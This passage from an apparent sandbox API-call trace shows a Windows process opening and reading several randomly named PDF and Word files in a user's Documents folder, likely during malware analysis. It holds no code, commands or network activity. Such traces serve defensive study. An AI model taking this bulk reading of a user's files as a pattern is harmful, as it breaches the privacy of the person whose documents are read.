lpOverlapped=0x0) returned 1 [0217.223] ReadFile (in: hFile=0x354, lpBuffer=0x25cea44, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x36f214, lpOverlapped=0x0 | out: lpBuffer=0x25cea44*, lpNumberOfBytesRead=0x36f214*=0x1000, lpOverlapped=0x0) returned 1 [0217.225] ReadFile (in: hFile=0x354, lpBuffer=0x25cea44, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x36f214, lpOverlapped=0x0 | out: lpBuffer=0x25cea44*, lpNumberOfBytesRead=0x36f214*=0x1000, lpOverlapped=0x0) returned 1 [0217.225] ReadFile (in: hFile=0x354, lpBuffer=0x25cea44, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x36f214, lpOverlapped=0x0 | out: lpBuffer=0x25cea44*, lpNumberOfBytesRead=0x36f214*=0x1000, lpOverlapped=0x0) returned 1 [0217.226] ReadFile (in: hFile=0x354, lpBuffer=0x25cea44, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x36f214, lpOverlapped=0x0 | out: lpBuffer=0x25cea44*, lpNumberOfBytesRead=0x36f214*=0x1000, lpOverlapped=0x0) returned 1 [0217.226] ReadFile (in: hFile=0x354, lpBuffer=0x25cea44, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x36f214, lpOverlapped=0x0 | out: lpBuffer=0x25cea44*, lpNumberOfBytesRead=0x36f214*=0xe0f, lpOverlapped=0x0) returned 1 [0217.226] ReadFile (in: hFile=0x354, lpBuffer=0x25cdfe7, nNumberOfBytesToRead=0x1f1, lpNumberOfBytesRead=0x36f214, lpOverlapped=0x0 | out: lpBuffer=0x25cdfe7*, lpNumberOfBytesRead=0x36f214*=0x0, lpOverlapped=0x0) returned 1 [0217.226] ReadFile (in: hFile=0x354, lpBuffer=0x25cea44, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x36f214, lpOverlapped=0x0 | out: lpBuffer=0x25cea44*, lpNumberOfBytesRead=0x36f214*=0x0, lpOverlapped=0x0) returned 1 [0217.228] CloseHandle (hObject=0x354) returned 1 [0217.228] GetFullPathNameW (in: lpFileName="C:\\Users\\kEecfMwgj\\Documents\\_t2rCPk2APhgTTU.pdf", nBufferLength=0x105, lpBuffer=0x36ed8c, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\kEecfMwgj\\Documents\\_t2rCPk2APhgTTU.pdf", lpFilePart=0x0) returned 0x30 [0217.228] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x36f018) returned 1 [0217.228] GetFileAttributesExW (in: lpFileName="C:\\Users\\kEecfMwgj\\Documents\\_t2rCPk2APhgTTU.pdf" (normalized: "c:\\users\\keecfmwgj\\documents\\_t2rcpk2aphgttu.pdf"), fInfoLevelId=0x0, lpFileInformation=0x25f22a4 | out: lpFileInformation=0x25f22a4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x8f764a20, ftCreationTime.dwHighDateTime=0x1d7e436, ftLastAccessTime.dwLowDateTime=0x6c77d050, ftLastAccessTime.dwHighDateTime=0x1d7e78f, ftLastWriteTime.dwLowDateTime=0x6c77d050, ftLastWriteTime.dwHighDateTime=0x1d7e78f, nFileSizeHigh=0x0, nFileSizeLow=0x12814)) returned 1 [0217.228] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x36f014) returned 1 [0217.228] GetFullPathNameW (in: lpFileName="C:\\Users\\kEecfMwgj\\Documents", nBufferLength=0x105, lpBuffer=0x36ed80, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\kEecfMwgj\\Documents", lpFilePart=0x0) returned 0x1c [0217.228] GetFullPathNameW (in: lpFileName="C:\\Users\\kEecfMwgj\\Documents\\_t2rCPk2APhgTTU.pdf", nBufferLength=0x105, lpBuffer=0x36ed78, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\kEecfMwgj\\Documents\\_t2rCPk2APhgTTU.pdf", lpFilePart=0x0) returned 0x30 [0217.228] GetFullPathNameW (in: lpFileName="C:\\Users\\kEecfMwgj\\Documents\\_t2rCPk2APhgTTU.pdf", nBufferLength=0x105, lpBuffer=0x36ed4c, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\kEecfMwgj\\Documents\\_t2rCPk2APhgTTU.pdf", lpFilePart=0x0) returned 0x30 [0217.229] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x36ef8c) returned 1 [0217.229] GetFileAttributesExW (in: lpFileName="C:\\Users\\kEecfMwgj\\Documents\\_t2rCPk2APhgTTU.pdf" (normalized: "c:\\users\\keecfmwgj\\documents\\_t2rcpk2aphgttu.pdf"), fInfoLevelId=0x0, lpFileInformation=0x36f250 | out: lpFileInformation=0x36f250*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x8f764a20, ftCreationTime.dwHighDateTime=0x1d7e436, ftLastAccessTime.dwLowDateTime=0x6c77d050, ftLastAccessTime.dwHighDateTime=0x1d7e78f, ftLastWriteTime.dwLowDateTime=0x6c77d050, ftLastWriteTime.dwHighDateTime=0x1d7e78f, nFileSizeHigh=0x0, nFileSizeLow=0x12814)) returned 1 [0217.229] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x36ef88) returned 1 [0217.229] GetFullPathNameW (in: lpFileName="C:\\Users\\kEecfMwgj\\Documents\\_t2rCPk2APhgTTU.pdf", nBufferLength=0x105, lpBuffer=0x36ec90, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\kEecfMwgj\\Documents\\_t2rCPk2APhgTTU.pdf", lpFilePart=0x0) returned 0x30 [0217.229] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x36f1a8) returned 1 [0217.229] CreateFileW (lpFileName="C:\\Users\\kEecfMwgj\\Documents\\_t2rCPk2APhgTTU.pdf" (normalized: "c:\\users\\keecfmwgj\\documents\\_t2rcpk2aphgttu.pdf"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x354 [0217.229] GetFileType (hFile=0x354) returned 0x1 [0217.229] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x36f1a4) returned 1 [0217.229] GetFileType (hFile=0x354) returned 0x1 [0217.230] ReadFile (in: hFile=0x354, lpBuffer=0x25f3598, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x36f214, lpOverlapped=0x0 | out: lpBuffer=0x25f3598*, lpNumberOfBytesRead=0x36f214*=0x1000, lpOverlapped=0x0) returned 1 [0217.231] ReadFile (in: hFile=0x354, lpBuffer=0x25f3598, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x36f214, lpOverlapped=0x0 | out: lpBuffer=0x25f3598*, lpNumberOfBytesRead=0x36f214*=0x1000, lpOverlapped=0x0) returned 1 [0217.231] ReadFile (in: hFile=0x354, lpBuffer=0x25f3598, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x36f214, lpOverlapped=0x0 | out: lpBuffer=0x25f3598*, lpNumberOfBytesRead=0x36f214*=0x1000, lpOverlapped=0x0) returned 1 [0217.232] ReadFile (in: hFile=0x354, lpBuffer=0x25f3598, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x36f214, lpOverlapped=0x0 | out: lpBuffer=0x25f3598*, lpNumberOfBytesRead=0x36f214*=0x1000, lpOverlapped=0x0) returned 1 [0217.232] ReadFile (in: hFile=0x354, lpBuffer=0x25f3598, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x36f214, lpOverlapped=0x0 | out: lpBuffer=0x25f3598*, lpNumberOfBytesRead=0x36f214*=0x1000, lpOverlapped=0x0) returned 1 [0217.232] ReadFile (in: hFile=0x354, lpBuffer=0x25f3598, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x36f214, lpOverlapped=0x0 | out: lpBuffer=0x25f3598*, lpNumberOfBytesRead=0x36f214*=0x1000, lpOverlapped=0x0) returned 1 [0217.233] ReadFile (in: hFile=0x354, lpBuffer=0x25f3598, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x36f214, lpOverlapped=0x0 | out: lpBuffer=0x25f3598*, lpNumberOfBytesRead=0x36f214*=0x1000, lpOverlapped=0x0) returned 1 [0217.233] ReadFile (in: hFile=0x354, lpBuffer=0x25f3598, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x36f214, lpOverlapped=0x0 | out: lpBuffer=0x25f3598*, lpNumberOfBytesRead=0x36f214*=0x1000, lpOverlapped=0x0) returned 1 [0217.233] ReadFile (in: hFile=0x354, lpBuffer=0x25f3598, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x36f214, lpOverlapped=0x0 | out: lpBuffer=0x25f3598*, lpNumberOfBytesRead=0x36f214*=0x1000, lpOverlapped=0x0) returned 1 [0217.233] ReadFile (in: hFile=0x354, lpBuffer=0x25f3598, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x36f214, lpOverlapped=0x0 | out: lpBuffer=0x25f3598*, lpNumberOfBytesRead=0x36f214*=0x1000, lpOverlapped=0x0) returned 1 [0217.234] ReadFile (in: hFile=0x354, lpBuffer=0x25f3598, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x36f214, lpOverlapped=0x0 | out: lpBuffer=0x25f3598*, lpNumberOfBytesRead=0x36f214*=0x1000, lpOverlapped=0x0) returned 1 [0217.234] ReadFile (in: hFile=0x354, lpBuffer=0x25f3598, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x36f214, lpOverlapped=0x0 | out: lpBuffer=0x25f3598*, lpNumberOfBytesRead=0x36f214*=0x1000, lpOverlapped=0x0) returned 1 [0217.234] ReadFile (in: hFile=0x354, lpBuffer=0x25f3598, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x36f214, lpOverlapped=0x0 | out: lpBuffer=0x25f3598*, lpNumberOfBytesRead=0x36f214*=0x1000, lpOverlapped=0x0) returned 1 [0217.235] ReadFile (in: hFile=0x354, lpBuffer=0x25f3598, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x36f214, lpOverlapped=0x0 | out: lpBuffer=0x25f3598*, lpNumberOfBytesRead=0x36f214*=0x1000, lpOverlapped=0x0) returned 1 [0217.236] ReadFile (in: hFile=0x354, lpBuffer=0x25f3598, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x36f214, lpOverlapped=0x0 | out: lpBuffer=0x25f3598*, lpNumberOfBytesRead=0x36f214*=0x1000, lpOverlapped=0x0) returned 1 [0217.236] ReadFile (in: hFile=0x354, lpBuffer=0x25f3598, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x36f214, lpOverlapped=0x0 | out: lpBuffer=0x25f3598*, lpNumberOfBytesRead=0x36f214*=0x1000, lpOverlapped=0x0) returned 1 [0217.236] ReadFile (in: hFile=0x354, lpBuffer=0x25f3598, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x36f214, lpOverlapped=0x0 | out: lpBuffer=0x25f3598*, lpNumberOfBytesRead=0x36f214*=0x1000, lpOverlapped=0x0) returned 1 [0217.237] ReadFile (in: hFile=0x354, lpBuffer=0x25f3598, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x36f214, lpOverlapped=0x0 | out: lpBuffer=0x25f3598*, lpNumberOfBytesRead=0x36f214*=0x1000, lpOverlapped=0x0) returned 1 [0217.237] ReadFile (in: hFile=0x354, lpBuffer=0x25f3598, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x36f214, lpOverlapped=0x0 | out: lpBuffer=0x25f3598*, lpNumberOfBytesRead=0x36f214*=0x814, lpOverlapped=0x0) returned 1 [0217.237] ReadFile (in: hFile=0x354, lpBuffer=0x25f294c, nNumberOfBytesToRead=0x3ec, lpNumberOfBytesRead=0x36f214, lpOverlapped=0x0 | out: lpBuffer=0x25f294c*, lpNumberOfBytesRead=0x36f214*=0x0, lpOverlapped=0x0) returned 1 [0217.237] ReadFile (in: hFile=0x354, lpBuffer=0x25f3598, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x36f214, lpOverlapped=0x0 | out: lpBuffer=0x25f3598*, lpNumberOfBytesRead=0x36f214*=0x0, lpOverlapped=0x0) returned 1 [0217.240] CloseHandle (hObject=0x354) returned 1 [0217.240] GetFullPathNameW (in: lpFileName="C:\\Users\\kEecfMwgj\\Documents\\Oraah1hNv81.docx", nBufferLength=0x105, lpBuffer=0x36ed8c, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\kEecfMwgj\\Documents\\Oraah1hNv81.docx", lpFilePart=0x0) returned 0x2d [0217.240] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x36f018) returned 1 [0217.240] GetFileAttributesExW (in: lpFileName="C:\\Users\\kEecfMwgj\\Documents\\Oraah1hNv81.docx" (normalized: "c:\\users\\keecfmwgj\\documents\\oraah1hnv81.docx"), fInfoLevelId=0x0, lpFileInformation=0x262e32c | out: lpFileInformation=0x262e32c*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x95b26ad0, ftCreationTime.dwHighDateTime=0x1d7878f, ftLastAccessTime.dwLowDateTime=0x2be7da40, ftLastAccessTime.dwHighDateTime=0x1d793ce, ftLastWriteTime.dwLowDateTime=0x2be7da40, ftLastWriteTime.dwHighDateTime=0x1d793ce, nFileSizeHigh=0x0, nFileSizeLow=0xf6bb)) returned 1 [0217.240] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x36f014) returned 1 [0217.240] GetFullPathNameW (in: lpFileName="C:\\Users\\kEecfMwgj\\Documents", nBufferLength=0x105, lpBuffer=0x36ed80, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\kEecfMwgj\\Documents", lpFilePart=0x0) returned 0x1c [0217.240] GetFullPathNameW (in: lpFileName="C:\\Users\\kEecfMwgj\\Documents\\Oraah1hNv81.docx", nBufferLength=0x105, lpBuffer=0x36ed78, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\kEecfMwgj\\Documents\\Oraah1hNv81.docx", lpFilePart=0x0) returned 0x2d [0217.241] GetFullPathNameW (in: lpFileName="C:\\Users\\kEecfMwgj\\Documents\\Oraah1hNv81.docx", nBufferLength=0x105, lpBuffer=0x36ed4c, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\kEecfMwgj\\Documents\\Oraah1hNv81.docx", lpFilePart=0x0) returned 0x2d [0217.241] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x36ef8c) returned 1 [0217.241] GetFileAttributesExW (in: lpFileName="C:\\Users\\kEecfMwgj\\Documents\\Oraah1hNv81.docx" (normalized: "c:\\users\\keecfmwgj\\documents\\oraah1hnv81.docx"), fInfoLevelId=0x0, lpFileInformation=0x36f250 | out: lpFileInformation=0x36f250*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x95b26ad0, ftCreationTime.dwHighDateTime=0x1d7878f, ftLastAccessTime.dwLowDateTime=0x2be7da40, ftLastAccessTime.dwHighDateTime=0x1d793ce, ftLastWriteTime.dwLowDateTime=0x2be7da40, ftLastWriteTime.dwHighDateTime=0x1d793ce, nFileSizeHigh=0x0, nFileSizeLow=0xf6bb)) returned 1 [0217.241] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x36ef88) returned 1 [0217.241] GetFullPathNameW (in: lpFileName="C:\\Users\\kEecfMwgj\\Documents\\Oraah1hNv81.docx", nBufferLength=0x105, lpBuffer=0x36ec90, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\kEecfMwgj\\Documents\\Oraah1hNv81.docx", lpFilePart=0x0) returned 0x2d [0217.241] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x36f1a8) returned 1 [0217.241] CreateFileW (lpFileName="C:\\Users\\kEecfMwgj\\Documents\\Oraah1hNv81.docx" (normalized: "c:\\users\\keecfmwgj\\documents\\oraah1hnv81.docx"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x354 [0217.241] GetFileType (hFile=0x354) returned 0x1 [0217.241] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x36f1a4) returned 1 [0217.241] GetFileType (hFile=0x354) returned 0x1 [0217.241] ReadFile (in: hFile=0x354, lpBuffer=0x262f5ec, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x36f214, lpOverlapped=0x0 | out: lpBuffer=0x262f5ec*, lpNumberOfBytesRead=0x36f214*=0x1000, lpOverlapped=0x0) returned 1 [0217.242] ReadFile (in: hFile=0x354, lpBuffer=0x262f5ec, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x36f214, lpOverlapped=0x0 | out: lpBuffer=0x262f5ec*, lpNumberOfBytesRead=0x36f214*=0x1000, lpOverlapped=0x0) returned 1 [0217.242] ReadFile (in: hFile=0x354, lpBuffer=0x262f5ec, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x36f214, lpOverlapped=0x0 | out: lpBuffer=0x262f5ec*, lpNumberOfBytesRead=0x36f214*=0x1000, lpOverlapped=0x0) returned 1 [0217.243] ReadFile (in: hFile=0x354, lpBuffer=0x262f5ec, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x36f214, lpOverlapped=0x0 | out: lpBuffer=0x262f5ec*, lpNumberOfBytesRead=0x36f214*=0x1000, lpOverlapped=0x0) returned 1 [0217.243] ReadFile (in: hFile=0x354, lpBuffer=0x262f5ec, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x36f214, lpOverlapped=0x0 | out: lpBuffer=0x262f5ec*, lpNumberOfBytesRead=0x36f214*=0x1000, lpOverlapped=0x0) returned 1 [0217.243] ReadFile (in: hFile=0x354, lpBuffer=0x262f5ec, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x36f214, lpOverlapped=0x0 | out: lpBuffer=0x262f5ec*, lpNumberOfBytesRead=0x36f214*=0x1000, lpOverlapped=0x0) returned 1 [0217.244] ReadFile (in: hFile=0x354, lpBuffer=0x262f5ec, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x36f214, lpOverlapped=0x0 | out: lpBuffer=0x262f5ec*, lpNumberOfBytesRead=0x36f214*=0x1000, lpOverlapped=0x0) returned 1 [0217.244] ReadFile (in: hFile=0x354, lpBuffer=0x262f5ec, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x36f214, lpOverlapped=0x0 | out: lpBuffer=0x262f5ec*, lpNumberOfBytesRead=0x36f214*=0x1000, lpOverlapped=0x0) returned 1 [0217.244] ReadFile (in: hFile=0x354, lpBuffer=0x262f5ec, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x36f214, lpOverlapped=0x0 | out: lpBuffer=0x262f5ec*, lpNumberOfBytesRead=0x36f214*=0x1000, lpOverlapped=0x0) returned 1 [0217.244] ReadFile (in: hFile=0x354, lpBuffer=0x262f5ec, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x36f214, lpOverlapped=0x0 | out: lpBuffer=0x262f5ec*, lpNumberOfBytesRead=0x36f214*=0x1000, lpOverlapped=0x0) returned 1 [0217.245] ReadFile (in: hFile=0x354, lpBuffer=0x262f5ec, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x36f214, lpOverlapped=0x0 | out: lpBuffer=0x262f5ec*, lpNumberOfBytesRead=0x36f214*=0x1000, lpOverlapped=0x0) returned 1 [0217.245] ReadFile (in: hFile=0x354, lpBuffer=0x262f5ec, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x36f214, lpOverlapped=0x0 | out: lpBuffer=0x262f5ec*, lpNumberOfBytesRead=0x36f214*=0x1000, lpOverlapped=0x0) returned 1 [0217.246] ReadFile (in: hFile=0x354, lpBuffer=0x262f5ec, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x36f214, lpOverlapped=0x0 | out: lpBuffer=0x262f5ec*, lpNumberOfBytesRead=0x36f214*=0x1000, lpOverlapped=0x0) returned 1 [0217.246] ReadFile (in: hFile=0x354, lpBuffer=0x262f5ec, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x36f214, lpOverlapped=0x0 | out: lpBuffer=0x262f5ec*, lpNumberOfBytesRead=0x36f214*=0x1000, lpOverlapped=0x0) returned 1 [0217.246] ReadFile (in: hFile=0x354, lpBuffer=0x262f5ec, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x36f214, lpOverlapped=0x0 | out: lpBuffer=0x262f5ec*, lpNumberOfBytesRead=0x36f214*=0x1000, lpOverlapped=0x0) returned 1 [0217.246] ReadFile (in: hFile=0x354, lpBuffer=0x262f5ec, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x36f214, lpOverlapped=0x0 | out: lpBuffer=0x262f5ec*, lpNumberOfBytesRead=0x36f214*=0x6bb, lpOverlapped=0x0) returned 1 [0217.247] ReadFile (in: hFile=0x354, lpBuffer=0x262ec47, nNumberOfBytesToRead=0x145, lpNumberOfBytesRead=0x36f214, lpOverlapped=0x0 | out: lpBuffer=0x262ec47*, lpNumberOfBytesRead=0x36f214*=0x0, lpOverlapped=0x0) returned 1 [0217.247] ReadFile (in: hFile=0x354, lpBuffer=0x262f5ec, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x36f214, lpOverlapped=0x0 | out: lpBuffer=0x262f5ec*, lpNumberOfBytesRead=0x36f214*=0x0, lpOverlapped=0x0) returned 1 [0217.249] CloseHandle (hObject=0x354) returned 1 [0217.249] GetFullPathNameW (in: lpFileName="C:\\Users\\kEecfMwgj\\Documents\\QIi5dKHoe7d4T0I8AD.docx", nBufferLength=0x105, lpBuffer=0x36ed8c, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\kEecfMwgj\\Documents\\QIi5dKHoe7d4T0I8AD.docx", lpFilePart=0x0) returned 0x34 [0217.249] GetFileAttributesExW (in: lpFileName="C:\\Users\\kEecfMwgj\\Documents\\QIi5dKHoe7d4T0I8AD.docx" (normalized: "c:\\users\\keecfmwgj\\documents\\qii5dkhoe7d4t0i8ad.docx"), fInfoLevelId=0x0, lpFileInformation=0x265f460 | out: lpFileInformation=0x265f460*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x1ec2a1c0, ftCreationTime.dwHighDateTime=0x1d7c91f, ftLastAccessTime.dwLowDateTime=0x5dfc3490, ftLastAccessTime.dwHighDateTime=0x1d7c9a7, ftLastWriteTime.dwLowDateTime=0x5dfc3490, ftLastWriteTime.dwHighDateTime=0x1d7c9a7, nFileSizeHigh=0x0, nFileSizeLow=0x174af)) returned 1 [0217.250] GetFullPathNameW (in: lpFileName="C:\\Users\\kEecfMwgj\\Documents", nBufferLength=0x105, lpBuffer=0x36ed80, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\kEecfMwgj\\Documents", lpFilePart=0x0) returned 0x1c [0217.250] GetFullPathNameW (in: lpFileName="C:\\Users\\kEecfMwgj\\Documents\\QIi5dKHoe7d4T0I8AD.docx", nBufferLength=0x105, lpBuffer=0x36ed78, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\kEecfMwgj\\Documents\\QIi5dKHoe7d4T0I8AD.docx", lpFilePart=0x0) returned 0x34 [0217.250] GetFullPathNameW (in: lpFileName="C:\\Users\\kEecfMwgj\\Documents\\QIi5dKHoe7d4T0I8AD.docx", nBufferLength=0x105, lpBuffer=0x36ed4c, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\kEecfMwgj\\Documents\\QIi5dKHoe7d4T0I8AD.docx", lpFilePart=0x0) returned 0x34 [0217.250] GetFileAttributesExW (in: lpFileName="C:\\Users\\kEecfMwgj\\Documents\\QIi5dKHoe7d4T0I8AD.docx" (normalized: "c:\\users\\keecfmwgj\\documents\\qii5dkhoe7d4t0i8ad.docx"), fInfoLevelId=0x0, lpFileInformation=0x36f250 | out: lpFileInformation=0x36f250*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x1ec2a1c0, ftCreationTime.dwHighDateTime=0x1d7c91f, ftLastAccessTime.dwLowDateTime=0x5dfc3490, ftLastAccessTime.dwHighDateTime=0x1d7c9a7, ftLastWriteTime.dwLowDateTime=0x5dfc3490, ftLastWriteTime.dwHighDateTime=0x1d7c9a7, nFileSizeHigh=0x0, nFileSizeLow=0x174af)) returned 1 [0217.250] GetFullPathNameW (in: lpFileName="C:\\Users\\kEecfMwgj\\Documents\\QIi5dKHoe7d4T0I8AD.docx", nBufferLength=0x105, lpBuffer=0x36ec90, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\kEecfMwgj\\Documents\\QIi5dKHoe7d4T0I8AD.docx", lpFilePart=0x0) returned 0x34 [0217.251] CreateFileW (lpFileName="C:\\Users\\kEecfMwgj\\Documents\\QIi5dKHoe7d4T0I8AD.docx" (normalized: "c:\\users\\keecfmwgj\\documents\\qii5dkhoe7d4t0i8ad.docx"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x354 [0217.251] GetFileType (hFile=0x354) returned 0x1 [0217.251] GetFileType (hFile=0x354) returned 0x1 [0217.251] ReadFile (in: hFile=0x354, lpBuffer=0x26607a0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x36f214, lpOverlapped=0x0 | out: lpBuffer=0x26607a0*, lpNumberOfBytesRead=0x36f214*=0x1000, lpOverlapped=0x0) returned 1 [0217.252] ReadFile (in: hFile=0x354, lpBuffer=0x26607a0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x36f214, lpOverlapped=0x0 | out: lpBuffer=0x26607a0*, lpNumberOfBytesRead=0x36f214*=0x1000, lpOverlapped=0x0) returned 1 [0217.252] ReadFile (in: hFile=0x354, lpBuffer=0x26607a0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x36f214, lpOverlapped=0x0 | out: lpBuffer=0x26607a0*, lpNumberOfBytesRead=0x36f214*=0x1000, lpOverlapped=0x0) returned 1 [0217.253] ReadFile (in: hFile=0x354, lpBuffer=0x26607a0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x36f214, lpOverlapped=0x0 | out: lpBuffer=0x26607a0*, lpNumberOfBytesRead=0x36f214*=0x1000, lpOverlapped=0x0) returned 1 [0217.253] ReadFile (in: hFile=0x354, lpBuffer=0x26607a0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x36f214, lpOverlapped=0x0 | out: lpBuffer=0x26607a0*, lpNumberOfBytesRead=0x36f214*=0x1000, lpOverlapped=0x0) returned 1 [0217.253] ReadFile (in: hFile=0x354, lpBuffer=0x26607a0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x36f214, lpOverlapped=0x0 | out: lpBuffer=0x26607a0*, lpNumberOfBytesRead=0x36f214*=0x1000, lpOverlapped=0x0) returned 1 [0217.254] ReadFile (in: hFile=0x354, lpBuffer=0x26607a0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x36f214, lpOverlapped=0x0 | out: lpBuffer=0x26607a0*, lpNumberOfBytesRead=0x36f214*=0x1000, lpOverlapped=0x0) returned 1 [0217.254] ReadFile (in: hFile=0x354, lpBuffer=0x26607a0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x36f214, lpOverlapped=0x0 | out: lpBuffer=0x26607a0*, lpNumberOfBytesRead=0x36f214*=0x1000, lpOverlapped=0x0) returned 1 [0217.255] ReadFile (in: hFile=0x354, lpBuffer=0x26607a0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x36f214, lpOverlapped=0x0 | out: lpBuffer=0x26607a0*, lpNumberOfBytesRead=0x36f214*=0x1000, lpOverlapped=0x0) returned 1 [0217.255] ReadFile (in: hFile=0x354, lpBuffer=0x26607a0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x36f214, lpOverlapped=0x0 | out: lpBuffer=0x26607a0*, lpNumberOfBytesRead=0x36f214*=0x1000, lpOverlapped=0x0) returned 1 [0217.255] ReadFile (in: hFile=0x354, lpBuffer=0x26607a0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x36f214, lpOverlapped=0x0 | out: lpBuffer=0x26607a0*, lpNumberOfBytesRead=0x36f214*=0x1000, lpOverlapped=0x0) returned 1 [0217.255] ReadFile (in: hFile=0x354, lpBuffer=0x26607a0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x36f214, lpOverlapped=0x0 | out: lpBuffer=0x26607a0*, lpNumberOfBytesRead=0x36f214*=0x1000, lpOverlapped=0x0) returned 1 [0217.256] ReadFile (in: hFile=0x354, lpBuffer=0x26607a0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x36f214, lpOverlapped=0x0 | out: lpBuffer=0x26607a0*, lpNumberOfBytesRead=0x36f214*=0x1000, lpOverlapped=0x0) returned 1 [0217.256] ReadFile (in: hFile=0x354, lpBuffer=0x26607a0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x36f214, lpOverlapped=0x0 | out: lpBuffer=0x26607a0*, lpNumberOfBytesRead=0x36f214*=0x1000, lpOverlapped=0x0) returned 1 [0217.256] ReadFile (in: hFile=0x354, lpBuffer=0x26607a0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x36f214, lpOverlapped=0x0 | out: lpBuffer=0x26607a0*, lpNumberOfBytesRead=0x36f214*=0x1000, lpOverlapped=0x0) returned 1 [0217.256] ReadFile (in: hFile=0x354, lpBuffer=0x26607a0, nNumberOfBytesToRead=0x1000, 